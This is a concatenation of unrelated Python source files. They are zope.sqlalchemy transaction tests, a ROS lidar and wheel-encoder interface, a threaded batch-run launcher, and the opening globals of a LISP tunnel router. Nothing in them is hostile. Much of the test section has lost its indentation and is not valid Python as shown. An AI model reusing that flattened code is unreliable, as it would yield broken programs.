                raise DummyTargetRaised(e)
            raise DummyTargetResult(result)
        else:
            raise DummyException('DummyDataManager cannot commit')

    def tpc_finish(self, trans):
        pass

    def tpc_abort(self, trans):
        pass

    def sortKey(self):
        return self.key
class ZopeSQLAlchemyTests(unittest.TestCase):
def setUp(self):
self.mappers = setup_mappers()
metadata.drop_all(engine)
metadata.create_all(engine)
def tearDown(self):
transaction.abort()
metadata.drop_all(engine)
orm.clear_mappers()
def testMarkUnknownSession(self):
import zope.sqlalchemy.datamanager
dummy = DummyDataManager(key='dummy.first')
session = Session()
mark_changed(session)
self.assertTrue(id(session) in zope.sqlalchemy.datamanager._SESSION_STATE)
def testAbortBeforeCommit(self):
# Simulate what happens in a conflict error
dummy = DummyDataManager(key='dummy.first')
session = Session()
conn = session.connection()
mark_changed(session)
try:
# Thus we could fail in commit
transaction.commit()
except:
# But abort must succed (and actually rollback the base connection)
transaction.abort()
pass
# Or the next transaction the next transaction will not be able to start!
transaction.begin()
session = Session()
conn = session.connection()
conn.execute("SELECT 1 FROM test_users")
mark_changed(session)
transaction.commit()
def testAbortAfterCommit(self):
# This is a regression test which used to wedge the transaction
# machinery when using PostgreSQL (and perhaps other) connections.
# Basically, if a commit failed, there was no way to abort the
# transaction. Leaving the transaction wedged.
transaction.begin()
session = Session()
conn = session.connection()
# At least PostgresSQL requires a rollback after invalid SQL is executed
self.assertRaises(Exception, conn.execute, "BAD SQL SYNTAX")
mark_changed(session)
try:
# Thus we could fail in commit
transaction.commit()
except:
# But abort must succed (and actually rollback the base connection)
transaction.abort()
pass
# Or the next transaction the next transaction will not be able to start!
transaction.begin()
session = Session()
conn = session.connection()
conn.execute("SELECT 1 FROM test_users")
mark_changed(session)
transaction.commit()
def testSimplePopulation(self):
session = Session()
query = session.query(User)
rows = query.all()
self.assertEqual(len(rows), 0)
session.add(User(id=1, firstname='udo', lastname='juergens'))
session.add(User(id=2, firstname='heino', lastname='n/a'))
session.flush()
rows = query.order_by(User.id).all()
self.assertEqual(len(rows), 2)
row1 = rows[0]
d = row1.asDict()
self.assertEqual(d, {'firstname': 'udo', 'lastname': 'juergens', 'id': 1})
# bypass the session machinary
stmt = sql.select(test_users.columns).order_by('id')
conn = session.connection()
results = conn.execute(stmt)
self.assertEqual(results.fetchall(), [(1, 'udo', 'juergens'), (2, 'heino', 'n/a')])
def testRelations(self):
session = Session()
session.add(User(id=1, firstname='foo', lastname='bar'))
user = session.query(User).filter_by(firstname='foo')[0]
user.skills.append(Skill(id=1, name='Zope'))
session.flush()
def testTransactionJoining(self):
transaction.abort() # clean slate
t = transaction.get()
self.assertFalse(
[r for r in t._resources if isinstance(r, tx.SessionDataManager)],
"Joined transaction too early")
session = Session()
session.add(User(id=1, firstname='udo', lastname='juergens'))
t = transaction.get()
# Expect this to fail with SQLAlchemy 0.4
self.assertTrue(
[r for r in t._resources if isinstance(r, tx.SessionDataManager)],
"Not joined transaction")
transaction.abort()
conn = Session().connection()
self.assertTrue(
[r for r in t._resources if isinstance(r, tx.SessionDataManager)],
"Not joined transaction")
def testTransactionJoiningUsingRegister(self):
transaction.abort() # clean slate
t = transaction.get()
self.assertFalse(
[r for r in t._resources if isinstance(r, tx.SessionDataManager)],
"Joined transaction too early")
session = EventSession()
session.add(User(id=1, firstname='udo', lastname='juergens'))
t = transaction.get()
self.assertTrue(
[r for r in t._resources if isinstance(r, tx.SessionDataManager)],
"Not joined transaction")
transaction.abort()
conn = EventSession().connection()
self.assertTrue(
[r for r in t._resources if isinstance(r, tx.SessionDataManager)],
"Not joined transaction")
def testSavepoint(self):
use_savepoint = not engine.url.drivername in tx.NO_SAVEPOINT_SUPPORT
t = transaction.get()
session = Session()
query = session.query(User)
self.assertFalse(query.all(), "Users table should be empty")
s0 = t.savepoint(optimistic=True) # this should always work
if not use_savepoint:
self.assertRaises(TypeError, t.savepoint)
return # sqlite databases do not support savepoints
s1 = t.savepoint()
session.add(User(id=1, firstname='udo', lastname='juergens'))
session.flush()
self.assertTrue(len(query.all()) == 1, "Users table should have one row")
s2 = t.savepoint()
session.add(User(id=2, firstname='heino', lastname='n/a'))
session.flush()
self.assertTrue(len(query.all()) == 2, "Users table should have two rows")
s2.rollback()
self.assertTrue(len(query.all()) == 1, "Users table should have one row")
s1.rollback()
self.assertFalse(query.all(), "Users table should be empty")
def testRollbackAttributes(self):
use_savepoint = not engine.url.drivername in tx.NO_SAVEPOINT_SUPPORT
if not use_savepoint:
return # sqlite databases do not support savepoints
t = transaction.get()
session = Session()
query = session.query(User)
self.assertFalse(query.all(), "Users table should be empty")
s1 = t.savepoint()
user = User(id=1, firstname='udo', lastname='juergens')
session.add(user)
session.flush()
s2 = t.savepoint()
user.firstname = 'heino'
session.flush()
s2.rollback()
self.assertEqual(user.firstname, 'udo', "User firstname attribute should have been rolled back")
def testCommit(self):
session = Session()
use_savepoint = not engine.url.drivername in tx.NO_SAVEPOINT_SUPPORT
query = session.query(User)
rows = query.all()
self.assertEqual(len(rows), 0)
transaction.commit() # test a none modifying transaction works
session = Session()
query = session.query(User)
session.add(User(id=1, firstname='udo', lastname='juergens'))
session.add(User(id=2, firstname='heino', lastname='n/a'))
session.flush()
rows = query.order_by(User.id).all()
self.assertEqual(len(rows), 2)
transaction.abort() # test that the abort really aborts
session = Session()
query = session.query(User)
rows = query.order_by(User.id).all()
self.assertEqual(len(rows), 0)
session.add(User(id=1, firstname='udo', lastname='juergens'))
session.add(User(id=2, firstname='heino', lastname='n/a'))
session.flush()
rows = query.order_by(User.id).all()
row1 = rows[0]
d = row1.asDict()
self.assertEqual(d, {'firstname': 'udo', 'lastname': 'juergens', 'id': 1})
transaction.commit()
rows = query.order_by(User.id).all()
self.assertEqual(len(rows), 2)
row1 = rows[0]
d = row1.asDict()
self.assertEqual(d, {'firstname': 'udo', 'lastname': 'juergens', 'id': 1})
# bypass the session (and transaction) machinary
results = engine.connect().execute(test_users.select())
self.assertEqual(len(results.fetchall()), 2)
def testCommitWithSavepoint(self):
if engine.url.drivername in tx.NO_SAVEPOINT_SUPPORT:
return
session = Session()
session.add(User(id=1, firstname='udo', lastname='juergens'))
session.add(User(id=2, firstname='heino', lastname='n/a'))
session.flush()
transaction.commit()
session = Session()
query = session.query(User)
# lets just test that savepoints don't affect commits
t = transaction.get()
rows = query.order_by(User.id).all()
s1 = t.savepoint()
session.delete(rows[1])
session.flush()
transaction.commit()
# bypass the session machinary
results = engine.connect().execute(test_users.select())
self.assertEqual(len(results.fetchall()), 1)
def testNestedSessionCommitAllowed(self):
# Existing code might use nested transactions
if engine.url.drivername in tx.NO_SAVEPOINT_SUPPORT:
return
session = Session()
session.add(User(id=1, firstname='udo', lastname='juergens'))
session.begin_nested()
session.add(User(id=2, firstname='heino', lastname='n/a'))
session.commit()
transaction.commit()
def testSessionCommitDisallowed(self):
session = Session()
session.add(User(id=1, firstname='udo', lastname='juergens'))
self.assertRaises(AssertionError, session.commit)
def testTwoPhase(self):
session = Session()
if not session.twophase:
return
session.add(User(id=1, firstname='udo', lastname='juergens'))
session.add(User(id=2, firstname='heino', lastname='n/a'))
session.flush()
transaction.commit()
# Test that we clean up after a tpc_abort
t = transaction.get()
def target():
return engine.connect().recover_twophase()
dummy = DummyDataManager(key='~~~dummy.last', target=target)
t.join(dummy)
session = Session()
query = session.query(User)
rows = query.all()
session.delete(rows[0])
session.flush()
result = None
try:
t.commit()
except DummyTargetResult as e:
result = e.args[0]
except DummyTargetRaised as e:
raise e.args[0]
self.assertEqual(len(result), 1, "Should have been one prepared transaction when dummy aborted")
transaction.begin()
self.assertEqual(len(engine.connect().recover_twophase()), 0, "Test no outstanding prepared transactions")
def testThread(self):
    """Run a full add/flush/query cycle in a separate thread; failures
    are re-raised in the main thread so the runner sees them."""
    transaction.abort()
    global thread_error
    thread_error = None

    def target():
        try:
            session = Session()
            metadata.drop_all(engine)
            metadata.create_all(engine)
            query = session.query(User)
            rows = query.all()
            self.assertEqual(len(rows), 0)
            session.add(User(id=1, firstname='udo', lastname='juergens'))
            session.add(User(id=2, firstname='heino', lastname='n/a'))
            session.flush()
            rows = query.order_by(User.id).all()
            self.assertEqual(len(rows), 2)
            row1 = rows[0]
            d = row1.asDict()
            self.assertEqual(d, {'firstname': 'udo', 'lastname': 'juergens', 'id': 1})
        except Exception as err:
            # stash the failure for the main thread; assertion errors in a
            # worker thread would otherwise be swallowed silently
            global thread_error
            thread_error = err
        transaction.abort()

    thread = threading.Thread(target=target)
    thread.start()
    thread.join()
    if thread_error is not None:
        raise thread_error  # reraise in current thread
def testBulkDelete(self):
    """A bulk query(...).delete() takes effect at transaction.commit()."""
    session = Session()
    session.add(User(id=1, firstname='udo', lastname='juergens'))
    session.add(User(id=2, firstname='heino', lastname='n/a'))
    transaction.commit()
    session = Session()
    session.query(User).delete()
    transaction.commit()
    # verify outside the session machinery, straight against the engine
    results = engine.connect().execute(test_users.select())
    self.assertEqual(len(results.fetchall()), 0)
def testBulkUpdate(self):
    """A bulk query(...).update() takes effect at transaction.commit()."""
    session = Session()
    session.add(User(id=1, firstname='udo', lastname='juergens'))
    session.add(User(id=2, firstname='heino', lastname='n/a'))
    transaction.commit()
    session = Session()
    session.query(User).update(dict(lastname="smith"))
    transaction.commit()
    # verify outside the session machinery, straight against the engine
    results = engine.connect().execute(test_users.select(test_users.c.lastname == "smith"))
    self.assertEqual(len(results.fetchall()), 2)
def testBulkDeleteUsingRegister(self):
    """Same as testBulkDelete but with the event-registered session."""
    session = EventSession()
    session.add(User(id=1, firstname='udo', lastname='juergens'))
    session.add(User(id=2, firstname='heino', lastname='n/a'))
    transaction.commit()
    session = EventSession()
    session.query(User).delete()
    transaction.commit()
    # verify outside the session machinery, straight against the engine
    results = engine.connect().execute(test_users.select())
    self.assertEqual(len(results.fetchall()), 0)
def testBulkUpdateUsingRegister(self):
    """Same as testBulkUpdate but with the event-registered session."""
    session = EventSession()
    session.add(User(id=1, firstname='udo', lastname='juergens'))
    session.add(User(id=2, firstname='heino', lastname='n/a'))
    transaction.commit()
    session = EventSession()
    session.query(User).update(dict(lastname="smith"))
    transaction.commit()
    # verify outside the session machinery, straight against the engine
    results = engine.connect().execute(test_users.select(test_users.c.lastname == "smith"))
    self.assertEqual(len(results.fetchall()), 2)
def testFailedJoin(self):
    """Using a session while the transaction is COMMITFAILED must raise,
    and a fresh transaction must work normally again afterwards."""
    # When a join is issued while the transaction is in COMMITFAILED, the
    # session is never closed and the session id stays in _SESSION_STATE,
    # which means the session won't be joined in the future either. This
    # causes the session to stay open forever, potentially accumulating
    # data, but never issuing a commit.
    dummy = DummyDataManager(key='dummy.first')
    transaction.get().join(dummy)
    try:
        transaction.commit()
    except DummyException:
        # Commit raised an error, we are now in COMMITFAILED
        pass
    self.assertEqual(transaction.get().status, ZopeStatus.COMMITFAILED)
    session = Session()
    # try to interact with the session while the transaction is still
    # in COMMITFAILED
    self.assertRaises(TransactionFailedError,
                      session.query(User).all)
    transaction.abort()
    # start a new transaction everything should be ok now
    transaction.begin()
    session = Session()
    self.assertEqual([], session.query(User).all())
    session.add(User(id=1, firstname='udo', lastname='juergens'))
    # abort transaction, session should be closed without commit
    transaction.abort()
    self.assertEqual([], session.query(User).all())
def testKeepSession(self):
    """With keep_session=True the session survives transaction.commit()
    and instances stay attached."""
    session = KeepSession()
    try:
        with transaction.manager:
            session.add(User(id=1, firstname='foo', lastname='bar'))
        user = session.query(User).get(1)
        # if the keep_session works correctly, this transaction will not close
        # the session after commit
        with transaction.manager:
            user.firstname = 'super'
            session.flush()
        # make sure the session is still attached to user
        self.assertEqual(user.firstname, 'super')
    finally:
        # KeepSession does not rollback on transaction abort
        session.rollback()
def testExpireAll(self):
    """Loaded instances are expired once the transaction ends."""
    session = Session()
    session.add(User(id=1, firstname='udo', lastname='juergens'))
    transaction.commit()
    session = Session()
    instance = session.query(User).get(1)
    transaction.commit()  # No work, session.close()
    self.assertEqual(sa.inspect(instance).expired, True)
class RetryTests(unittest.TestCase):
    """Concurrency tests: write conflicts between two independent
    transaction managers must surface as *retryable* errors."""

    def setUp(self):
        # two separate engines/sessions/transaction managers so the test
        # can run genuinely concurrent database transactions
        self.mappers = setup_mappers()
        metadata.drop_all(engine)
        metadata.create_all(engine)
        self.tm1 = transaction.TransactionManager()
        self.tm2 = transaction.TransactionManager()
        # With psycopg2 you might supply isolation_level='SERIALIZABLE' here,
        # unfortunately that is not supported by cx_Oracle.
        e1 = sa.create_engine(TEST_DSN)
        e2 = sa.create_engine(TEST_DSN)
        self.s1 = orm.sessionmaker(
            bind=e1,
            extension=tx.ZopeTransactionExtension(transaction_manager=self.tm1),
            twophase=TEST_TWOPHASE,
        )()
        self.s2 = orm.sessionmaker(
            bind=e2,
            extension=tx.ZopeTransactionExtension(transaction_manager=self.tm2),
            twophase=TEST_TWOPHASE,
        )()
        # seed one row for the tests to fight over
        self.tm1.begin()
        self.s1.add(User(id=1, firstname='udo', lastname='juergens'))
        self.tm1.commit()

    def tearDown(self):
        self.tm1.abort()
        self.tm2.abort()
        metadata.drop_all(engine)
        orm.clear_mappers()

    def testRetry(self):
        """A concurrent-modification error on flush must be retryable."""
        # sqlite is unable to run this test as the database is locked
        tm1, tm2, s1, s2 = self.tm1, self.tm2, self.s1, self.s2
        # make sure we actually start a session.
        tm1.begin()
        self.assertTrue(len(s1.query(User).all()) == 1, "Users table should have one row")
        tm2.begin()
        self.assertTrue(len(s2.query(User).all()) == 1, "Users table should have one row")
        # delete through tm1 while tm2 updates the same row
        s1.query(User).delete()
        user = s2.query(User).get(1)
        user.lastname = u('smith')
        tm1.commit()
        raised = False
        try:
            s2.flush()
        except orm.exc.ConcurrentModificationError as e:
            # This error is thrown when the number of updated rows is not as expected
            raised = True
            self.assertTrue(tm2._retryable(type(e), e), "Error should be retryable")
        self.assertTrue(raised, "Did not raise expected error")

    def testRetryThread(self):
        """A serialization failure raised through the DBAPI while blocked
        on SELECT ... FOR UPDATE must be retryable."""
        tm1, tm2, s1, s2 = self.tm1, self.tm2, self.s1, self.s2
        # make sure we actually start a session.
        tm1.begin()
        self.assertTrue(len(s1.query(User).all()) == 1, "Users table should have one row")
        tm2.begin()
        s2.connection().execute("SET TRANSACTION ISOLATION LEVEL SERIALIZABLE")
        self.assertTrue(len(s2.query(User).all()) == 1, "Users table should have one row")
        s1.query(User).delete()
        raised = False

        def target():
            # give s2 time to issue its locking SELECT, then commit the
            # conflicting delete from the other transaction
            time.sleep(0.2)
            tm1.commit()

        thread = threading.Thread(target=target)
        thread.start()
        try:
            user = s2.query(User).with_lockmode('update').get(1)
        except exc.DBAPIError as e:
            # This error wraps the underlying DBAPI module error, some of which are retryable
            raised = True
            retryable = tm2._retryable(type(e), e)
            self.assertTrue(retryable, "Error should be retryable")
        self.assertTrue(raised, "Did not raise expected error")
        thread.join()  # well, we must have joined by now
class MultipleEngineTests(unittest.TestCase):
    """Tests for a session spanning two separately-bound engines."""

    def setUp(self):
        self.mappers = setup_mappers()
        bound_metadata1.drop_all()
        bound_metadata1.create_all()
        bound_metadata2.drop_all()
        bound_metadata2.create_all()

    def tearDown(self):
        transaction.abort()
        bound_metadata1.drop_all()
        bound_metadata2.drop_all()
        orm.clear_mappers()

    def testTwoEngines(self):
        """One transaction.commit() must persist work on both engines."""
        session = UnboundSession()
        session.add(TestOne(id=1))   # mapped to bound_metadata1's engine
        session.add(TestTwo(id=2))   # mapped to bound_metadata2's engine
        session.flush()
        transaction.commit()
        session = UnboundSession()
        rows = session.query(TestOne).all()
        self.assertEqual(len(rows), 1)
        rows = session.query(TestTwo).all()
        self.assertEqual(len(rows), 1)
def tearDownReadMe(test):
    """Doctest teardown: drop the tables the README.txt examples created.

    :param test: the doctest instance; Base and engine are taken from
        its globals namespace.
    """
    Base = test.globs['Base']
    engine = test.globs['engine']
    Base.metadata.drop_all(engine)
def test_suite():
    """Assemble the unit-test suites plus the README doctest suite."""
    from unittest import TestSuite, makeSuite
    import doctest
    optionflags = doctest.NORMALIZE_WHITESPACE | doctest.ELLIPSIS
    # normalize doctest output differences across Python 2/3 and PyPy
    checker = RENormalizing([
        # Python 3 includes module name in exceptions
        (re.compile(r"sqlalchemy.orm.exc.DetachedInstanceError:"),
         "DetachedInstanceError:"),
        # Python 3 drops the u'' prefix on unicode strings
        (re.compile(r"u('[^']*')"), r"\1"),
        # PyPy includes __builtin__ in front of classes defined in doctests
        (re.compile(r"__builtin__[.]Address"), "Address"),
    ])
    suite = TestSuite()
    suite.addTest(makeSuite(ZopeSQLAlchemyTests))
    suite.addTest(makeSuite(MultipleEngineTests))
    # retry tests need real isolation/concurrency support in the backend
    if TEST_DSN.startswith('postgres') or TEST_DSN.startswith('oracle'):
        suite.addTest(makeSuite(RetryTests))
    suite.addTest(doctest.DocFileSuite('README.txt', optionflags=optionflags,
                                       checker=checker, tearDown=tearDownReadMe,
                                       globs={'TEST_DSN': TEST_DSN, 'TEST_TWOPHASE': TEST_TWOPHASE}))
    return suite
|
sensors.py | #!/usr/bin/env python
"""
Sensor module that contains ROS interface objects for various sensors.
Currently supporting: Lidars, Wheel Encoders
"""
from threading import Thread
import math
import rospy
from sensor_msgs.msg import LaserScan
from svea_msgs.msg import lli_encoder
from geometry_msgs.msg import TwistWithCovarianceStamped
__author__ = "Frank Jiang and Tobias Bolin"
__copyright__ = "Copyright 2020, Frank Jiang"
__credits__ = ["Frank Jiang", "Tobias Bolin"]
__license__ = "MIT"
__maintainer__ = "Frank Jiang"
__email__ = "frankji@kth.se"
__status__ = "Development"
class Lidar():
    """
    Minimal ROS interface to a Lidar. Caches the most recent LaserScan
    and fans each new scan out to registered callback functions.
    """

    def __init__(self):
        self.scan = []
        # functions invoked with (scan, angle_min, angle_increment)
        # every time a fresh scan arrives
        self.callbacks = []

    def start(self):
        """
        Spins up ROS background thread; must be called to start
        receiving and sending data

        :return: itself
        :rtype: Lidar
        """
        Thread(target=self._init_and_spin_ros, args=()).start()
        return self

    def _init_and_spin_ros(self):
        rospy.loginfo("Starting Lidar Interface Node: \n" + str(self))
        self._collect_srvs()
        self._start_listen()

    def _collect_srvs(self):
        # no ROS services required for this interface
        pass

    def _start_listen(self):
        rospy.Subscriber('scan', LaserScan, self._read_scan,
                         tcp_nodelay=True)
        rospy.loginfo("Lidar Interface successfully initialized")
        rospy.spin()

    def _read_scan(self, scan_msg):
        # cache the scan and its geometry, then notify every listener
        self.scan = scan_msg.ranges
        self.angle_min = scan_msg.angle_min
        self.angle_max = scan_msg.angle_max
        self.angle_increment = scan_msg.angle_increment
        self.time_increment = scan_msg.time_increment
        self.last_scan_time = scan_msg.scan_time
        for callback in self.callbacks:
            callback(self.scan, self.angle_min, self.angle_increment)

    def add_callback(self, cb):
        """Register *cb* to be called on every new scan.

        :param cb: function accepting (list of ranges, min angle,
                   angle increment)
        :type cb: function
        """
        self.callbacks.append(cb)

    def remove_callback(self, cb):
        """Deregister *cb*; every occurrence is removed.

        :param cb: previously registered callback function
        :type cb: function
        """
        while cb in self.callbacks:
            self.callbacks.remove(cb)
class WheelEncoder():
    """Interface for wheel encoders

    :param vehicle_name: name of the vehicle, defaults to ''
    :type vehicle_name: str, optional
    :param encoder_frame: Transform frame id of the encoders,
                          defaults to 'base_link'
    :type encoder_frame: str, optional
    :param encoder_topic: Topic that encoder messages should be read from,
                          defaults to 'lli/encoder'
    :type encoder_topic: str, optional
    :param direction_topic: Topic with twist messages
                            used for calculating the direction, defaults to ''
    :type direction_topic: str, optional
    :param axle_track: Width between the wheels in mm,
                       defaults to 199.0
    :type axle_track: float, optional
    :param wheel_radius: Radius of the wheels in mm,
                         defaults to 60.0
    :type wheel_radius: float, optional
    :param ticks_per_revolution: Number of encoder ticks in one revolution of a wheel,
                                 defaults to 60
    :type ticks_per_revolution: int, optional
    :param linear_covariance: Covariance of the linear velocity in the published twist messages,
                              defaults to 0.2
    :type linear_covariance: float, optional
    :param angular_covariance: Covariance of the angular velocity
                               in the published twist messages, defaults to 0.4
    :type angular_covariance: float, optional
    """

    def __init__(self,
                 vehicle_name='',
                 encoder_frame='base_link',
                 encoder_topic='lli/encoder',
                 direction_topic='',
                 axle_track=199.0,
                 wheel_radius=60.0,
                 ticks_per_revolution=60,
                 linear_covariance=0.2,
                 angular_covariance=0.4,
                 ):
        if vehicle_name:
            self.vehicle_name = vehicle_name
        else:
            # derive the vehicle name from the ROS namespace when not given
            namespace = rospy.get_namespace()
            self.vehicle_name = namespace.split('/')[-1]
        self.linear_covariance = linear_covariance
        self.angular_covariance = angular_covariance
        self.encoder_topic = encoder_topic
        self.direction_topic = direction_topic
        self.frame_id = encoder_frame
        # Vehicle parameters
        mm_to_meter = 1e-3
        tau = 2 * math.pi
        self.axle_track = axle_track * mm_to_meter  # stored in meters
        # NOTE(review): wheel_radius is kept in mm (only the tick
        # coefficient below is converted to meters) -- confirm before
        # using this attribute directly
        self.wheel_radius = wheel_radius
        self.ticks_per_revolution = ticks_per_revolution
        # meters of wheel travel per encoder tick
        self.tick_to_distance_coefficient = (
            wheel_radius * tau * mm_to_meter / ticks_per_revolution
        )
        # Storage fields
        self.direction = 1           # 1 forward, -1 reverse, 0 stationary
        self.linear_velocity = 0.0   # m/s
        self.angular_velocity = 0.0  # rad/s
        # NOTE(review): the two per-wheel fields below are initialized but
        # never updated by _process_encoder_data -- confirm intent
        self.r_wheel_velocity = 0.0
        self.l_wheel_velocity = 0.0
        # list of functions to call whenever a new reading comes in
        self.callbacks = []

    def start(self):
        """
        Spins up ROS background thread; must be called to start
        receiving and sending data

        :return: itself
        :rtype: WheelEncoderInterface
        """
        Thread(target=self._init_and_spin_ros, args=()).start()
        return self

    def _init_and_spin_ros(self):
        rospy.loginfo('Starting wheel encoder Interface for'
                      + self.vehicle_name)
        self._collect_srvs()
        self._start_listen()
        rospy.loginfo('Succesfully initiated wheel encoder Interface for'
                      + self.vehicle_name)

    def _collect_srvs(self):
        # no ROS services required for this interface
        pass

    def _start_listen(self):
        self.encoder_subscriber = rospy.Subscriber(
            self.encoder_topic,
            lli_encoder,
            self._process_encoder_data,
            tcp_nodelay=True)
        if self.direction_topic:
            self.actuation_subscriber = rospy.Subscriber(
                self.direction_topic,
                TwistWithCovarianceStamped,
                self._process_direction,
                tcp_nodelay=True)

    def _process_encoder_data(self, msg):
        """Convert raw tick counts into signed linear/angular velocity
        (differential-drive model) and notify all callbacks."""
        right_wheel_velocity = self._calc_wheel_velocity(
            msg.right_ticks,
            msg.right_time_delta)
        left_wheel_velocity = self._calc_wheel_velocity(
            msg.left_ticks,
            msg.left_time_delta)
        direction = self.direction
        # Linear velocity
        self.linear_velocity = (right_wheel_velocity + left_wheel_velocity)/2
        self.linear_velocity *= direction
        # Angular velocity
        angular_velocity = (right_wheel_velocity - left_wheel_velocity)
        angular_velocity /= self.axle_track
        angular_velocity *= direction
        self.angular_velocity = angular_velocity
        for cb in self.callbacks:
            cb(self)

    def _process_direction(self, msg):
        """Update the driving-direction estimate from a twist message.

        Velocities within the +/- epsilon deadband count as stationary.
        """
        velocity = msg.twist.twist.linear.x
        direction_epsilon = self.tick_to_distance_coefficient * 0.5  # m/s
        if velocity > direction_epsilon:
            self.direction = 1
        elif velocity < -direction_epsilon:
            # bug fix: was 'velocity < direction_epsilon', which swallowed
            # the whole deadband and made the else branch unreachable
            self.direction = -1
        else:
            # bug fix: was 'self.directions = 0' (typo), which never
            # updated the real attribute
            self.direction = 0

    def _calc_wheel_velocity(self, ticks, time_delta):
        """Return wheel speed in m/s given ticks and a microsecond delta;
        zero time delta yields zero to avoid division by zero."""
        if time_delta == 0:
            return 0
        distance = ticks * self.tick_to_distance_coefficient
        velocity = (distance/time_delta) * 1e6  # time_delta is in microseconds
        return velocity

    def add_callback(self, cb):
        """Add a callback. Every function passed into this method
        will be called whenever new information comes in from the sensor.

        :param cb: A callback function intended for responding to the
                   reception of a new reading.
                   The function should take a WheelEncoder object
                   as input.
        :type cb: function
        :return: Handle to the callback function
        """
        self.callbacks.append(cb)

    def remove_callback(self, cb):
        """Remove callback so it will no longer be called when state
        information is received

        :param cb: A callback function that should be no longer used
                   in response to the reception of state info
        :type cb: function
        """
        while cb in self.callbacks:
            self.callbacks.pop(self.callbacks.index(cb))
|
launch_repeat_runs.py | #
# Copyright John Reid 2009
#
"""
Code to launch the site DPM framework several times concurrently.
"""
import os, subprocess, logging, sys, Queue, threading, time, random
def ensure_dir_exists(dir):
    """Makes a directory (and parents) if it does not already exist.

    Bug fix: the original used os.access(dir, os.X_OK) as an existence
    test, which fails for directories that exist but are not executable
    and then crashes in os.makedirs; os.path.isdir is the correct check.
    """
    if not os.path.isdir(dir):
        logging.info('Making directory: %s', dir)
        os.makedirs(dir)
def get_new_dir(template_dir, run_index):
    "Return the per-run directory (zero-padded index) under template_dir."
    subdir = '%04d' % run_index
    return os.path.join(template_dir, subdir)
def make_link(src, dst):
    "Create a symlink dst -> src, replacing whatever already sits at dst."
    if os.path.exists(dst):
        # remove the stale file/link so os.symlink does not fail
        os.unlink(dst)
    os.symlink(src, dst)
def make_new_dir_from_template(template_dir, new_dir):
    "Copies or links data from template directory into new directory."
    # NOTE(review): relies on the module-level global 'tag' (parsed from
    # the command line) for the cache file names -- not usable standalone.
    # make sure directories exist
    ensure_dir_exists(os.path.join(new_dir, 'cache'))
    for ext in [
        'hit-counts',
        'ucsc-analysis',
    ]:
        # link cache file; paths are relative because the link lives two
        # levels below the template directory
        cached_filename = '%s.%s' % (tag, ext)
        if os.path.exists(os.path.join(template_dir, 'cache', cached_filename)):
            template_filename = os.path.join('..', '..', 'cache', cached_filename)
            new_filename = os.path.join(new_dir, 'cache', cached_filename)
            make_link(template_filename, new_filename)
    # link options file if it exists
    if os.path.exists(os.path.join(template_dir, 'options.py')):
        make_link(os.path.join('..', 'options.py'), os.path.join(new_dir, 'options.py'))
def execute_cmd(args, cwd):
    "Execute the command."
    logging.info('Executing: %s in %s', args, cwd)
    status = subprocess.call(args, cwd=cwd)
    if status != 0:
        # non-zero exit is logged but deliberately not raised
        logging.error('Exit status: %d: %s', status, args)
def worker():
    "Worker thread to execute tasks from the queue."
    # Runs forever as a daemon thread: pulls a run index off the global
    # queue 'q', prepares a run directory, then runs the analysis and
    # validation scripts in it. Relies on module globals q, template_dir
    # and tag.
    while True:
        run_index = q.get()
        logging.info('Run #: % 3d' % run_index)
        new_dir = get_new_dir(template_dir, run_index)
        make_new_dir_from_template(template_dir, new_dir)
        # scripts live three directory levels above each run directory
        args = [
            'python',
            '../../../tp_go_analysis.py',
            tag
        ]
        execute_cmd(args, new_dir)
        args = [
            'python',
            '../../../validate.py',
            tag
        ]
        execute_cmd(args, new_dir)
        q.task_done()
#
# Set up logging
#
# Log to stderr (basicConfig) and to a file. NOTE: this script targets
# Python 2 (Queue / xrange below).
logging.basicConfig(level=logging.DEBUG)
file_handler = logging.FileHandler('launch-repeat-runs.log')
file_handler.setFormatter(logging.Formatter('%(asctime)s:%(levelname)s:%(message)s'))
logging.getLogger().addHandler(file_handler)

#
# Get positional arguments
#
try:
    logging.info('Command line: %s', ' '.join(sys.argv))
    script_name = sys.argv.pop(0)
    template_dir = sys.argv.pop(0)
    logging.info('Template directory: %s' % template_dir)
    num_runs = int(sys.argv.pop(0))
    logging.info('# runs: %d' % num_runs)
    tag = sys.argv.pop(0)
    logging.info('Tag: %s' % tag)
except:
    # any parse failure (missing argument, non-integer run count) lands
    # here; print usage and re-raise for the traceback
    logging.error('USAGE: python %s <template directory> <number of runs> <tag>', script_name)
    raise

#
# Set up worker threads
#
num_worker_threads = 4
stagger = 3  # NOTE(review): defined but apparently unused; the put loop sleeps 1s
logging.info('Using %d worker threads' % num_worker_threads)
logging.info('Initialising worker threads')
q = Queue.Queue()
for i in range(num_worker_threads):
    t = threading.Thread(target=worker)
    t.setDaemon(True)  # daemon threads do not block interpreter exit
    t.start()

logging.info('Populating task queue')
for run_index in xrange(num_runs):
    q.put(run_index)
    time.sleep(1.)  # stagger run start-ups

#
# Wait until completed
#
logging.info('Blocking until all tasks completed')
q.join()  # block until all tasks are done
logging.info('All tasks completed')
|
lisp-itr.py | # -----------------------------------------------------------------------------
#
# Copyright 2013-2019 lispers.net - Dino Farinacci <farinacci@gmail.com>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# -----------------------------------------------------------------------------
#
# lisp-itr.py
#
# This file performs LISP Ingress Tunnel Router (ITR) functionality.
#
# -----------------------------------------------------------------------------
from future import standard_library
standard_library.install_aliases()
from builtins import str
from builtins import range
import lisp
import lispconfig
import socket
import select
import threading
import time
import os
from subprocess import getoutput
import struct
try:
import pcappy
except:
pass
#endtry
import pcapy
#------------------------------------------------------------------------------
#
# Global data structures relative to the lisp-itr process.
#
lisp_send_sockets = [None, None, None]
lisp_ipc_listen_socket = None
lisp_ipc_punt_socket = None
lisp_ephem_listen_socket = None
lisp_ephem_nat_socket = None
lisp_ephem_port = lisp.lisp_get_ephemeral_port()
lisp_ephem_nat_port = lisp.lisp_get_ephemeral_port()
lisp_raw_socket = None
lisp_raw_v6_socket = None
lisp_periodic_timer = None
lisp_itr_info_timer = None
#
# This is for testing sending from one local EID-prefix to another EID-prefix
# on the same system. Rather than natively forwarding a packet, the mapping
# system is used.
#
lisp_xtr_loopback = False
#
# Used to start pcap threads concurrently.
#
lisp_pcap_lock = threading.Lock()
#------------------------------------------------------------------------------
#
# lisp_itr_show_command
#
